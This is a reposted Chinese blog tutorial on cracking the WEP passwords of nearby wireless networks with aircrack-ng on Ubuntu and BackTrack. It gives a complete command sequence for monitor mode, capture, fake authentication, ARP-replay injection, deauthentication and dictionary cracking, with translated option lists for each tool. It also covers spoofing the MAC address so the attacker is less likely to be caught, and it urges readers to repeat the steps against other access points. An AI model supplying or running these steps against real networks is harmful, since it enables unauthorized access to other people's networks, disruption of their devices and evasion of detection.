加载中…
正文 字体大小:

Ubuntu下破解WLAN无线网络密码资料(转)

(2010-06-06 23:24:36)
标签:

ubuntu

wlan

破解

分类: ubuntu
http://hi.baidu.com/gounianwangwang/blog/item/eb8c48edb39ec1d8b21cb156.html
可以参考:http://www.php-oa.com/2009/04/16/ubuntu-airmon-ng.html

 

一、安装Ubuntu和aircrack-ng

先安装 Ubuntu ,更新系统到最新
终端中输入 sudo apt-get install aircrack-ng 安装aircrack-ng
没联网的话 到别的电脑上网下载aircrack-ng Ubuntu DEB安装包 安装

下载地址:http://packages.ubuntu.com/zh-cn/jaunty/i386/aircrack-ng/download

二、破解过程

1、启动无线网卡的监控模式,在终端中输入:sudo airmon-ng start wlan0
(wlan0是无线网卡的端口,可在终端中输入 ifconfig 查看)

2、查看无线AP在终端中输入:
sudo airodump-ng mon0
(特别说明:启动监控模式后无线网的端口现在是 mon0 !!!)
看看有哪些采用wep加密的AP在线,然后按 ctrl+c 退出,保留终端

3、抓包
另开一个终端,输入:
sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0
(-c 后面跟着的6是要破解的AP工作频道,--bissid后面跟着的AP's MAC是要欲破解AP的MAC地址,-w后面跟着wep的是抓下来的数据包DATA保存的文件名,具体情况根据步骤2里面的在线AP更改频道和MAC地址,DATA保存的文件名可随便命名)

4、与AP建立虚拟连接
再另开一个终端,输入:
sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0
(-h后面跟着的My MAC是自己的无线网卡的MAC地址,命令:
iwlist wlan0 scanning
可查看自己的MAC地址)

5、进行注入
成功建立虚拟连接后输入:
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0
现在回头看下步骤3的终端是不是DATA在开始飞涨!

6、解密
收集有5000个以上的DATA之后,另开一个终端,输入:
sudo aircrack-ng wep*.cap
进行解密
(如果没算出来的话,继续等,aircrack-ng 会在DATA每增加多5000个之后就自动再运行,直到算出密码为至)

7、收工
破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。现在可以冲浪去了,或者重复步聚1-7破解其它的AP 呵呵兄弟们冲浪时可别太猛了,不然把主人给冲翻了可就不好。

8:如果破解后出现  例如:
KEY FOUND! 12:34:5A:BC:DE
Decrypted correctly: 100%
 密码就是 :12345abcde
这个密码是我花了2小时,9000个 data后得到的。Ubuntu下破解WLAN无线网络密码资料(转)

以上步骤在ubuntu11.04 thinkpad x200 通过。
Ubuntu下破解WLAN无线网络密码资料(转)

====================================================

 

=========================================================

本文 主要是针对无线网络的密码破解,使用平台 linux 2.26.21.5 ,实现环境 BACKTRACK 3 FINAL(USB),无线破解工具 Aircrack-ng ,官方网站http://www.aircrack-ng .org ,Aircrack-ng系列工具也有windows 平台版本,但是本人的小黑的始终不能在win下抓包,所以只能 弃 win 从 lin 了,另外 win 下扫描到的 AP 也比 lin 下少了很多。其实 WIN 并不完整的支持 TCP/IP 协议族,有些协议 win 直接丢弃不用。网络本来从一开始就是 unix 的天下,win 只是在后来加入了网络的功能。

Aircrack-ng工具包有很多工具,我用到的 工具主要有以下几个:

airmon-ng 处理网卡工作模式

airodump-ng 抓包

aircrack-ng 破解

aireplay-ng 发包,干扰

另外还要用到以下 linux 命令:

ifconfig 查看修改网卡状态和参数

macchanger 伪造 MAC

iwconfig 主要针对无线网卡的工具 (同 ifconfig)

iwlist 获取无线网络的更详细信息

另外还有其他的 linux 基本命令,我就不提示了。

具体破解步骤:

1. 修改无线网卡状态:先 dow

2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能

3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡

4. 修改无线网卡状态: up

5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标

6. 监听抓包:生成 .cap 或 .ivs

7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包

8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解

下面详细介绍一下 各个命令的基本用法(参照命令的英文说明)

1. ifconfig

用来配置网卡,我们这里主要用来 禁用和启用 网卡:

ifconfig ath0 down

ifconfig ath0 up

禁用一下网卡的目的是为了下一 步修改 MAC 。

2.macchanger

用来改变网卡的 MAC 地址,具体用法如下:

usage: macchanger [options] device

-h 显示帮助

-V 显示版本

-s 显示当前MAC

-e 不改变mac,使用硬件厂商写入的MAC

-a 自动生成一个同类型的MAC,同厂商的

-A 自动生成一个不同类型的MAC,不同厂商的

-r 生成任意MAC

-l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品

-m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。

3.airmon-ng

启 动无线网卡进入 Monitor 模式,

useage: airmon-ng <start|stop|check> <interface> [channel]

<start|stop|check> 启动,停止,检测

<interface> 指定无线网卡

[channel] 监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了

4.iwconfig

专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。

useage:iwconfig interface [options]

[essid{NN|ON|OFF}] 指定essid号 开启关闭

[nwid{NN|on|off}] 指定网络id号 开启关闭

[mode {managed|ad-hoc|....}] 指定无线网络工作模式/类型

[freq N.NNNN[K|M|G]] 指定工作频率

[channel N] 指定频道

[ap {N|off|auto}] 指定AP号 关闭/自动

[sens N] sens 号

[nick N] nick 号

[rate {N|auto|fixed}] 速率控制

[rts {N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了

[frag {N|auto|fixed|off}] 碎片控制

[enc {NNNN-NNNN|off}] 范围

[power {period N|timeout N}] 电源 频率/超时

[retry {limit N|lifetime N}] 重试 限次/超时

[txpower N{mw|dBm}] 功率 毫瓦/分贝

[commit] 处理

5.iwlist

主要用来 显示无线网卡的一些附加信息,同上

useage: iwlist [interface] options

scanning 扫描

frequency 频率

channel 频道

bitrate 速率

rate 速率

encryption 加密

key 密钥

power 电源

txpower 功率

ap ap

accespoints ap

peers 直连

event 事件

6.airodump-ng

抓包工具,我最喜欢用的,详细用法如下:

usage: airodump-ng <options> <interface>[,<interface>,...]

Options:

--ivs :仅将抓取信息保存为 .ivs

--gpsd :使用 GPSd

--write <prefix> :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分

-w :同 --write

--beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的

--update <secs> :显示更新延迟,没有用过

--showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了

-h :隐藏已知的,配合上面的选项使用

-f <msecs> :跳频时间

--berlin <secs> :无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文 去读原文,翻 译的都会有出入,这是我的理解.(mhy_mhy注)

-r <file> :从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵

Filter options:

--encrypt <suite> : 使用密码序列过滤 AP

--netmask <netmask> : 使用掩码过滤 AP

--bssid <bssid> : 使用 bssid 过滤 AP

-a : 过滤无关的客户端

默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下 命令操作:

--channel <channels>:指定频道

--band <abg> :制定带宽

-C <frequencies> :指定频率MHz

--cswitch <method> : 设置频道交换方式

0 : FIFO (default) 先进先出(默认)

1 : Round Robin 循环

2 : Hop on last 最后一跳

-s : 同上

--help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文

7.aireplay-ng

搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的 AP 设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸.

usage: aireplay-ng <options> <replay interface>

Filter options:

-b bssid : AP的 MAC

-d dmac : 目标的 MAC

-s smac : 来源的 MAC

-m len : 最小包长度

-n len : 最大包长度

-u type : 帧控制, type field

-v subt : 帧控制, subtype field

-t tods : 帧控制, To DS bit

-f fromds : 帧控制, From DS bit

-w iswep : 帧控制, WEP bit

-D : 禁用 AP 发现功能

Replay options:

-x nbpps : 每秒包数量

-p fctrl : 框架设定 (hex)

-a bssid : 设置AP的 mac

-c dmac : 设置目标的 MAC

-h smac : 设置来源的 mac

-g value : 改变环缓存大小 (默认8)

-F : 选择第一个匹配的包

Fakeauth attack options:

-e essid : 设置目标 AP 的 SSID

-o npckts : 每秒爆破的包数量 (0 自动, 默认 1)

-q sec : 存活时间 秒

-y prga : 共享可信的 key流

ARP欺骗原理 Replay attack options:

-j : 注入 fromDS 数据包,还没有用过这个选项

Fragmentation attack options:

-k IP : 设置目的IP 碎片

-l IP : 设置源IP碎片

Test attack options:

-B : 激活 bitrate 测试

source options:

-i iface : 设置抓包的接口设备

-r file : 从pcap文件析取数据包

attack modes (Numbers can still be used): 攻击模式,最具杀伤力的地方

--deauth count : 不信任一切 (-0)

--fakeauth delay : 欺骗AP的信任 (-1)

--interactive : 交互的选择 (-2)

--arpreplay : 标准的 ARP欺骗原理-request replay (-3)

--chopchop : 解密 WEP 包 (-4)

--fragment : 生成有效的 key流 (-5)

--caffe-latte : 从客户端获取新的 IVs (-6)

--cfrag : 对客户端进行碎片攻击 (-7)

--test : 测试注射及效果 (-9)

--help : 显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付 那些不给出作者就引用的人,鄙视抄袭.

8.aircrack-ng

破解KEY,漫长的过程.漫不漫长取决于两个方面: 一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.

usage: aircrack-ng [options] <.cap / .ivs file(s)>

Common options:

-a <amode> : 暴破 (1/WEP, 2/WPA-PSK)

-e <essid> : 选择 essid 为目标

-b <bssid> : 选择 ap的 mac 为目标,就是破解识别的关键字

-q : 使用安静模式,无数出模式

-C <macs> : 将所有的 AP 合并为一个虚拟的

Static WEP cracking options:

-c : 仅搜索字母数字

-t : 仅搜索二进制

-h : 搜索数字关键字 (用于坏掉的部分),翻译不出来了

-d <mask> : 指定掩码(A1:XX:CF:YY)

-m <maddr> : 用 MAC 匹配可用的数据包

-n <nbits> : WEP 长度 64/128/152/256/512

-i <index> : WEP 索引(1 to 4), default: any

-f <fudge> : 暴破强度 默认2,原文字面意思是"禽兽强迫 捏造 事实",呵呵

-k <korek> : 禁用一种破解方式 (1 to 17)

-x or -x0 : 禁用最新关键字暴破

-x1 : 使用最新关键字暴破 默认

-x2 : 用最新两个字节暴破

-y : 实验单线程模式

-K : KoreK 攻击 (pre-PTW)

-s : 显示为 ASCII

-M <num> : 最大数量 ivs 使用

-D : WEP 非隐蔽模式

-P <num> : PTW debug: 1 disable Klein, 2 PTW

-1 : 尝试一次 PTW

WEP and WPA-PSK cracking options:

-w <words> : 指定目录文件,可以多个

-r <DB> : 制定 airolib-ng 数据库,不能和 -w 一起使用

--help : 显示这个帮助

说明: 作者: papagogo 时间: 2008-11-21 11:31

【接一楼】

说明:

好了,用法都解释完 了,主要是后面这三个命令,这是我从英文译过来的,结合我的使用情况,以及我的理解.参数全,没有漏掉任何一项,可能我是第一个把这个完整翻译过来的,之 前我没有找到有翻译好的,有些地方并不是准确的遵循原文,希望感兴趣的朋友在转载的时候注上我:mhy_mhy.

下面以我的硬件实例来操作一下:

我的硬件是 atheros 的 a/b/g 无线网卡,在 linux 中显示为 ath0 ,我只列出我常用的命令步骤,不再做任何解释:

ifconfig ath0 down

macchanger -r ath0

macchanger -r wifi0

ifconfig ath1 up

airmon-ng start ath1 6

iwconfig ath1

iwlist ath1 scanning

airodump-ng -w *.cap -c 6 ath1

aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1

aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1

aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1

aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB ath1

aireplay-ng -3 -b <AP MAC> -h <my MAC> -i ath1

aircrack-ng -x -f 2 *.cap

aircrack-ng -w passdict.txt *.cap

aircrack-ng -n 64 -b apmac *.ivs

aircrack-ng -w passdict.txt -b 00:00:00:00:00:00 *.cap

注:1 Aircrack-ng在新德里软件里可以找到

2macchanger 在新德里软件管理也有

0

阅读 评论 收藏 转载 喜欢 打印举报
  • 评论加载中,请稍候...
发评论

    发评论

    以上网友发言只代表其个人观点,不代表新浪网的观点或立场。

      

    新浪BLOG意见反馈留言板 电话:4006900000 提示音后按1键(按当地市话标准计费) 欢迎批评指正

    新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 会员注册 | 产品答疑

    新浪公司 版权所有